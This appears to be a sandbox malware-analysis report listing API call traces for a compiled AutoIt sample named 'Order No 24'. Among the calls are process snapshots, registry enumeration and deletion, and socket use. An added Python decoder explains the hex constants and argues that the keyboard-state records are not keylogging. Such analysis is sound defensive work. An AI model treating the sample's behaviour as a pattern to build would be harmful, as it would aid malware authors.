                                                                                                                                  • InvalidateRect.USER32(?,00000000,00000001,?), ref: 009F03D6
                                                                                                                                  • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 009F03FF
                                                                                                                                  • ShowWindow.USER32(00000003,00000000), ref: 009F0421
                                                                                                                                  • DefDlgProcW.USER32(?,00000005,?,?), ref: 009F0440
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                   • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$MessageSend$InvalidateLongMetricsMoveProcRectShowSystem
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3356174886-0
                                                                                                                                  • Opcode ID: ea6b5eb1631e1079ec4f35cf3c603381a6eb7d1dfaadb1844aa95c35e67fad94
                                                                                                                                  • Instruction ID: 870bff5ad7d396cfcf0dc806e510c46153854778e8aa92b245e75b9cf895f7f3
                                                                                                                                  • Opcode Fuzzy Hash: ea6b5eb1631e1079ec4f35cf3c603381a6eb7d1dfaadb1844aa95c35e67fad94
                                                                                                                                  • Instruction Fuzzy Hash: 2EA1DF3560061AEFDB18CF68C9857FDBBB9BF88700F048115EE58A7291E774AD61CB90
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                   • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: b99bb406217b1b8acdf07ab84696fe54608f8400ed798d35355067fd1a2f8e5a
                                                                                                                                  • Instruction ID: fb40b33c2f44e7bee82ca482c185e9a4407dbe1fd273423b65f0e8f5f29baa54
                                                                                                                                  • Opcode Fuzzy Hash: b99bb406217b1b8acdf07ab84696fe54608f8400ed798d35355067fd1a2f8e5a
                                                                                                                                  • Instruction Fuzzy Hash: 21716CB1900109EFDF14CF98CC89ABEBB78FF85314F248149F915AA251C734AA52CFA5
                                                                                                                                  APIs
                                                                                                                                  • _memset.LIBCMT ref: 009E225A
                                                                                                                                  • _memset.LIBCMT ref: 009E2323
                                                                                                                                  • ShellExecuteExW.SHELL32(?), ref: 009E2368
                                                                                                                                    • Part of subcall function 0098936C: __swprintf.LIBCMT ref: 009893AB
                                                                                                                                    • Part of subcall function 0098936C: __itow.LIBCMT ref: 009893DF
                                                                                                                                    • Part of subcall function 0099C6F4: _wcscpy.LIBCMT ref: 0099C717
                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 009E242F
                                                                                                                                  • FreeLibrary.KERNEL32(00000000), ref: 009E243E
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                   • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
                                                                                                                                  • String ID: @
                                                                                                                                  • API String ID: 4082843840-2766056989
                                                                                                                                  • Opcode ID: 21c188a3a17c053b7c743ceb3d3d5d53e85b340594130096564f3652a6e75eca
                                                                                                                                  • Instruction ID: eb2c61d75905d697c4d717d560f5b826b038a32cfe5a6f355d07a8a97b9ca796
                                                                                                                                  • Opcode Fuzzy Hash: 21c188a3a17c053b7c743ceb3d3d5d53e85b340594130096564f3652a6e75eca
                                                                                                                                  • Instruction Fuzzy Hash: E3716F719006599FCF05EFA9C881AAEB7F9FF88310F108459E855AB391DB34AD41CF90
APIs
• GetParent.USER32(?), ref: 009C3DE7
• GetKeyboardState.USER32(?), ref: 009C3DFC
• SetKeyboardState.USER32(?), ref: 009C3E5D
• PostMessageW.USER32(?,00000101,00000010,?), ref: 009C3E8B
• PostMessageW.USER32(?,00000101,00000011,?), ref: 009C3EAA
• PostMessageW.USER32(?,00000101,00000012,?), ref: 009C3EF0
• PostMessageW.USER32(?,00000101,0000005B,?), ref: 009C3F13
Memory Dump Source
• Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
• Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
Similarity
• API ID: MessagePost$KeyboardState$Parent
• String ID:
• API String ID: 87235514-0
• Opcode ID: 8339f13251d74f9cee9341f1006ed0e976a5132f4f263559a97f0364b5448609
• Instruction ID: 167fcdc833944c09df3eccc8bb4c97639148f3fd5c145028c6869cb799c52d31
• Opcode Fuzzy Hash: 8339f13251d74f9cee9341f1006ed0e976a5132f4f263559a97f0364b5448609
• Instruction Fuzzy Hash: 2651D2A0E087D53EFB3643648C55FB67EA95B06304F08C98DF0D5568C2D2A9AEC4D762
APIs
• GetParent.USER32(00000000), ref: 009C3C02
• GetKeyboardState.USER32(?), ref: 009C3C17
• SetKeyboardState.USER32(?), ref: 009C3C78
• PostMessageW.USER32(00000000,00000100,00000010,?), ref: 009C3CA4
• PostMessageW.USER32(00000000,00000100,00000011,?), ref: 009C3CC1
• PostMessageW.USER32(00000000,00000100,00000012,?), ref: 009C3D05
• PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 009C3D26
Memory Dump Source
• Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
• Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
Similarity
• API ID: MessagePost$KeyboardState$Parent
• String ID:
• API String ID: 87235514-0
• Opcode ID: ca0403bcf45d9c5f96c2104b719a34a9bbf989b03d3ee58292e2d9d84bd3e649
• Instruction ID: 85978164d5f79c51bd044118231c4e1752b319a5ccd919f7eeb0220f5dd225f8
• Opcode Fuzzy Hash: ca0403bcf45d9c5f96c2104b719a34a9bbf989b03d3ee58292e2d9d84bd3e649
• Instruction Fuzzy Hash: B151F6A1E487D53DFB3283648C55FBABE9D6B06300F0CC48CE4D6568C2D695EE84D762
APIs
Memory Dump Source
• Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
• Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
Similarity
• API ID: _wcsncpy$LocalTime
• String ID:
• API String ID: 2945705084-0
• Opcode ID: 6d97b6ff4558afb2ee1e3353088e0809f716b662813cb15b622d3edd387ac4c3
• Instruction ID: def2745a575be41be06123f9c5c7bbe99638a9562261d2c3eaff9152b3131566
• Opcode Fuzzy Hash: 6d97b6ff4558afb2ee1e3353088e0809f716b662813cb15b622d3edd387ac4c3
• Instruction Fuzzy Hash: 46417166C1021476DF10EBF8C886BCFB7ACDF86710F50896AE514E3122FA35E61487E6
APIs
• RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?), ref: 009E3DA1
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 009E3DCB
• FreeLibrary.KERNEL32(00000000), ref: 009E3E80
  • Part of subcall function 009E3D72: RegCloseKey.ADVAPI32(?), ref: 009E3DE8
  • Part of subcall function 009E3D72: FreeLibrary.KERNEL32(?), ref: 009E3E3A
  • Part of subcall function 009E3D72: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 009E3E5D
• RegDeleteKeyW.ADVAPI32(?,?), ref: 009E3E25
Memory Dump Source
• Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
• Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
Similarity
• API ID: EnumFreeLibrary$CloseDeleteOpen
• String ID:
• API String ID: 395352322-0
• Opcode ID: 98ffbf0517ea95c15b4f556cd47e1147aa2368e6f618f9b44ef11345db73bc8b
• Instruction ID: 228bb0c7001d9f857d73da7f36559e19b0986b3fffe3db8164fbde27c6728f2e
• Opcode Fuzzy Hash: 98ffbf0517ea95c15b4f556cd47e1147aa2368e6f618f9b44ef11345db73bc8b
• Instruction Fuzzy Hash: 7331EAB2901149BFDB15DFD5DC89AFFB7BCEB08300F00416AE512A3150DA749F8A9BA0
APIs
• SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 009E8FE7
• GetWindowLongW.USER32(0101E788,000000F0), ref: 009E901A
• GetWindowLongW.USER32(0101E788,000000F0), ref: 009E904F
• SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 009E9081
• SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 009E90AB
• GetWindowLongW.USER32(00000000,000000F0), ref: 009E90BC
• SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 009E90D6
Memory Dump Source
• Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
• Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
Similarity
• API ID: LongWindow$MessageSend
• String ID:
• API String ID: 2178440468-0
• Opcode ID: db5a20edd1aad7af8c448ee04840a75167953c9d8a81d0738db6ace3d8a6a6c3
• Instruction ID: d2afda25ed2b9391f047838a2315b16ec9b36f1ff3bd79ec3238ea83f7e3cd20
• Opcode Fuzzy Hash: db5a20edd1aad7af8c448ee04840a75167953c9d8a81d0738db6ace3d8a6a6c3
• Instruction Fuzzy Hash: 4D316479210254EFDB22CF99DC84F6477A9FB8A315F150164F5098B2B2CB72AC42CB40
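The API lines in the keyboard-state records (refs 009C3DE7 to 009C3F13 and 009C3C02 to 009C3D26) and in the window-style record just above (refs 009E8FE7 to 009E90D6) print message numbers, key codes and window-long indexes as raw hex (00000101, 00000010, 000000F0), which hides what the functions actually do. The following decoder is an added example for reading such records; it is not part of the Joe Sandbox report or of the sample. The symbolic names come from winuser.h, the sample lines are copied from this page, and one assumption is labelled in the code: the report prints the byte immediate of a `push -10h` as 000000F0 without sign extension, so the nIndex argument of Get/SetWindowLongW is reinterpreted as a signed byte to recover GWL_STYLE (-16). The same reinterpretation must not be applied to the SendMessageW message number, where 0xF0 and 0xF1 are the genuinely positive BM_GETCHECK and BM_SETCHECK.

```python
"""Decode the raw Win32 constants in Joe Sandbox 'APIs' listing lines.

Added example for reading this report; not part of Joe Sandbox or of the
sample. Symbolic names are from winuser.h; the sample lines are copied
from the records on this page.
"""
import re
from typing import Dict, List, Optional, Tuple

MESSAGES: Dict[int, str] = {
    0x0100: "WM_KEYDOWN",
    0x0101: "WM_KEYUP",
    0x00F0: "BM_GETCHECK",
    0x00F1: "BM_SETCHECK",
}
# wParam of WM_KEYDOWN / WM_KEYUP is a virtual-key code.
VIRTUAL_KEYS: Dict[int, str] = {0x10: "VK_SHIFT", 0x11: "VK_CONTROL", 0x12: "VK_MENU", 0x5B: "VK_LWIN"}
# wParam of BM_SETCHECK is a BST_* check state.
BST_STATES: Dict[int, str] = {0: "BST_UNCHECKED", 1: "BST_CHECKED", 2: "BST_INDETERMINATE"}
# nIndex of Get/SetWindowLong; negative values select window attributes.
GWL_INDEXES: Dict[int, str] = {-4: "GWL_WNDPROC", -16: "GWL_STYLE", -20: "GWL_EXSTYLE", -21: "GWL_USERDATA"}

# Matches e.g. "• PostMessageW.USER32(?,00000101,00000010,?), ref: 009C3E8B"
LINE_RE = re.compile(
    r"^\s*•?\s*(?P<api>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Constructed sample: API lines copied from the keyboard-state and window-style
# records on this page, plus one non-API line to show that it is skipped.
SAMPLE_LISTING: List[str] = [
    "• GetParent.USER32(?), ref: 009C3DE7",
    "• GetKeyboardState.USER32(?), ref: 009C3DFC",
    "• SetKeyboardState.USER32(?), ref: 009C3E5D",
    "• PostMessageW.USER32(?,00000101,00000010,?), ref: 009C3E8B",
    "• PostMessageW.USER32(?,00000101,00000011,?), ref: 009C3EAA",
    "• PostMessageW.USER32(?,00000101,00000012,?), ref: 009C3EF0",
    "• PostMessageW.USER32(?,00000101,0000005B,?), ref: 009C3F13",
    "Memory Dump Source",
    "• SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 009E8FE7",
    "• GetWindowLongW.USER32(0101E788,000000F0), ref: 009E901A",
    "• SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 009E90AB",
    "• SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 009E90D6",
]


def parse_args(raw: str) -> List[Optional[int]]:
    """Hex arguments become ints; '?' (not recoverable statically) becomes None."""
    return [None if a.strip() in ("", "?") else int(a, 16) for a in raw.split(",")]


def as_signed_byte(value: int) -> int:
    """Assumption: the report prints a 'push -10h' immediate as 000000F0 (no sign
    extension), so a byte-range value is reinterpreted as signed to recover -16."""
    return value - 0x100 if 0x80 <= value <= 0xFF else value


def decode_call(line: str) -> Optional[Tuple[str, str, List[str]]]:
    """Return (api, ref, symbolic notes) for an API line, or None for any other line."""
    m = LINE_RE.match(line)
    if not m:
        return None
    api, args, ref = m["api"], parse_args(m["args"]), m["ref"]
    notes: List[str] = []
    if api.startswith(("PostMessage", "SendMessage")) and len(args) >= 3:
        msg, wparam = args[1], args[2]
        name = "msg ?" if msg is None else MESSAGES.get(msg, f"msg 0x{msg:04X}")
        notes.append(name)
        if name in ("WM_KEYDOWN", "WM_KEYUP") and wparam is not None:
            notes.append(VIRTUAL_KEYS.get(wparam, f"vk 0x{wparam:02X}"))
        elif name == "BM_SETCHECK" and wparam is not None:
            notes.append(BST_STATES.get(wparam, f"state {wparam}"))
    elif api.startswith(("GetWindowLong", "SetWindowLong")) and len(args) >= 2 and args[1] is not None:
        idx = as_signed_byte(args[1])
        notes.append(GWL_INDEXES.get(idx, f"nIndex {idx}"))
    return api, ref, notes


def annotate(line: str) -> Optional[str]:
    """Human-readable form of one line, e.g. 'PostMessageW@009C3E8B: WM_KEYUP VK_SHIFT'."""
    decoded = decode_call(line)
    if decoded is None:
        return None
    api, ref, notes = decoded
    return f"{api}@{ref}: " + (" ".join(notes) if notes else "(no constant to decode)")


def decode_listing(lines: List[str]) -> List[str]:
    """Annotate every API line of a record, dropping the non-API lines."""
    return [a for a in (annotate(line) for line in lines) if a is not None]


def posted_keys(lines: List[str]) -> List[Tuple[str, str]]:
    """(message, virtual key) pairs a record sends via Post/SendMessage, in listing order."""
    keys: List[Tuple[str, str]] = []
    for line in lines:
        decoded = decode_call(line)
        if decoded and len(decoded[2]) == 2 and decoded[2][0] in ("WM_KEYDOWN", "WM_KEYUP"):
            keys.append((decoded[2][0], decoded[2][1]))
    return keys


if __name__ == "__main__":
    for entry in decode_listing(SAMPLE_LISTING):
        print(entry)
    print("keys:", posted_keys(SAMPLE_LISTING))
```

Decoded, the first keyboard record reads the keyboard state, rewrites it with SetKeyboardState and posts WM_KEYUP for VK_SHIFT, VK_CONTROL, VK_MENU and VK_LWIN to the parent window; its sibling at 009C3C02 does the same with WM_KEYDOWN. That is synthetic modifier-key handling, not a keyboard hook (no SetWindowsHookEx or GetAsyncKeyState appears in either record). The window-style record queries BM_GETCHECK, sets BM_SETCHECK with BST_UNCHECKED or BST_CHECKED and reads and writes GWL_STYLE, which is checkbox or radio-button state handling. Both are consistent with runtime library code of the compiled AutoIt script the report flags (the #requireadmin and #notrayicon directive strings appear in a later record), so on their own these records are not evidence of keylogging by the sample.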
APIs
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 009C08F2
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 009C0918
• SysAllocString.OLEAUT32(00000000), ref: 009C091B
• SysAllocString.OLEAUT32(?), ref: 009C0939
• SysFreeString.OLEAUT32(?), ref: 009C0942
• StringFromGUID2.OLE32(?,?,00000028), ref: 009C0967
• SysAllocString.OLEAUT32(?), ref: 009C0975
Memory Dump Source
• Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
• Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
Similarity
• API ID: String$Alloc$ByteCharMultiWide$FreeFrom
• String ID:
• API String ID: 3761583154-0
• Opcode ID: db88c151999082b1ee60b46a9b18c66b0dabb1d021b36b0895ff3aa02e37600c
• Instruction ID: 2d3e2d2f08625d4f6f43df9eab478e345f90e8aabb4fba0c731e019f416427c8
• Opcode Fuzzy Hash: db88c151999082b1ee60b46a9b18c66b0dabb1d021b36b0895ff3aa02e37600c
• Instruction Fuzzy Hash: F2218376A01219AFEF10DFACCC88EBB73ECEB49360B408525F915DB161D674EC468B61
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
Similarity
• API ID: __wcsnicmp
• String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
APIs
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 009C09CB
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 009C09F1
• SysAllocString.OLEAUT32(00000000), ref: 009C09F4
• SysAllocString.OLEAUT32 ref: 009C0A15
• SysFreeString.OLEAUT32 ref: 009C0A1E
• StringFromGUID2.OLE32(?,?,00000028), ref: 009C0A38
• SysAllocString.OLEAUT32(?), ref: 009C0A46
Similarity
• API ID: String$Alloc$ByteCharMultiWide$FreeFrom
• String ID:
APIs
  • Part of subcall function 0099D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0099D1BA
  • Part of subcall function 0099D17C: GetStockObject.GDI32(00000011), ref: 0099D1CE
  • Part of subcall function 0099D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0099D1D8
• SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 009EA32D
• SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 009EA33A
• SendMessageW.USER32(?,00000402,00000000,00000000), ref: 009EA345
• SendMessageW.USER32(?,00000401,00000000,00640000), ref: 009EA354
• SendMessageW.USER32(?,00000404,00000001,00000000), ref: 009EA360
Strings
Similarity
• API ID: MessageSend$CreateObjectStockWindow
• String ID: Msctls_Progress32
APIs
• GetClientRect.USER32(?,?), ref: 0099CCF6
• GetWindowRect.USER32(?,?), ref: 0099CD37
• ScreenToClient.USER32(?,?), ref: 0099CD5F
• GetClientRect.USER32(?,?), ref: 0099CE8C
• GetWindowRect.USER32(?,?), ref: 0099CEA5
Similarity
• API ID: Rect$Client$Window$Screen
• String ID:
APIs
• CreateToolhelp32Snapshot.KERNEL32 ref: 009E1C18
• Process32FirstW.KERNEL32(00000000,?), ref: 009E1C26
• __wsplitpath.LIBCMT ref: 009E1C54
  • Part of subcall function 009A1DFC: __wsplitpath_helper.LIBCMT ref: 009A1E3C
• _wcscat.LIBCMT ref: 009E1C69
• Process32NextW.KERNEL32(00000000,?), ref: 009E1CDF
• CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 009E1CF1
Similarity
• API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
• String ID:
APIs
  • Part of subcall function 009E3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,009E2BB5,?,?), ref: 009E3C1D
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 009E30AF
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 009E30EF
• RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 009E3112
• RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 009E313B
• RegCloseKey.ADVAPI32(?,?,00000000), ref: 009E317E
• RegCloseKey.ADVAPI32(00000000), ref: 009E318B
Similarity
• API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue
• String ID:
APIs
• GetMenu.USER32(?), ref: 009E8540
• GetMenuItemCount.USER32(00000000), ref: 009E8577
• GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 009E859F
• GetMenuItemID.USER32(?,?), ref: 009E860E
• GetSubMenu.USER32(?,?), ref: 009E861C
• PostMessageW.USER32(?,00000111,?,00000000), ref: 009E866D
Similarity
• API ID: Menu$Item$CountMessagePostString
• String ID:
APIs
• _memset.LIBCMT ref: 009C4B10
• GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 009C4B5B
• IsMenu.USER32(00000000), ref: 009C4B7B
• CreatePopupMenu.USER32 ref: 009C4BAF
• GetMenuItemCount.USER32(000000FF), ref: 009C4C0D
• InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 009C4C3E
Memory Dump Source
• Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
• Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
Similarity
• API ID: Menu$Item$CountCreateInfoInsertPopup_memset
• String ID:
• API String ID: 3311875123-0
APIs
• select.WSOCK32(00000000,00000001,00000000,00000000,?,000003E8,00A1DC00), ref: 009D8E7C
• WSAGetLastError.WSOCK32(00000000), ref: 009D8E89
• __WSAFDIsSet.WSOCK32(00000000,00000001,00000000), ref: 009D8EAD
• #16.WSOCK32(?,?,00000000,00000000), ref: 009D8EC5
• _strlen.LIBCMT ref: 009D8EF7
• WSAGetLastError.WSOCK32(00000000), ref: 009D8F6A
Similarity
• API ID: ErrorLast$_strlenselect
• String ID:
• API String ID: 2217125717-0
APIs
  • Part of subcall function 0099B34E: GetWindowLongW.USER32(?,000000EB), ref: 0099B35F
• BeginPaint.USER32(?,?,?), ref: 0099AC2A
• GetWindowRect.USER32(?,?), ref: 0099AC8E
• ScreenToClient.USER32(?,?), ref: 0099ACAB
• SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0099ACBC
• EndPaint.USER32(?,?,?,?,?), ref: 0099AD06
• Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 009FE673
Similarity
• API ID: PaintWindow$BeginClientLongRectRectangleScreenViewport
• String ID:
• API String ID: 2592858361-0
APIs
• ShowWindow.USER32(00A41628,00000000,00A41628,00000000,00000000,00A41628,?,009FDC5D,00000000,?,00000000,00000000,00000000,?,009FDAD1,00000004), ref: 009EE40B
• EnableWindow.USER32(00000000,00000000), ref: 009EE42F
• ShowWindow.USER32(00A41628,00000000), ref: 009EE48F
• ShowWindow.USER32(00000000,00000004), ref: 009EE4A1
• EnableWindow.USER32(00000000,00000001), ref: 009EE4C5
• SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 009EE4E8
Similarity
• API ID: Window$Show$Enable$MessageSend
• String ID:
• API String ID: 642888154-0
APIs
• InterlockedExchange.KERNEL32(?,000001F5), ref: 009C98D1
  • Part of subcall function 0099F4EA: std::exception::exception.LIBCMT ref: 0099F51E
  • Part of subcall function 0099F4EA: __CxxThrowException@8.LIBCMT ref: 0099F533
• ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 009C9908
• EnterCriticalSection.KERNEL32(?), ref: 009C9924
• LeaveCriticalSection.KERNEL32(?), ref: 009C999E
• ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 009C99B3
• InterlockedExchange.KERNEL32(?,000001F6), ref: 009C99D2
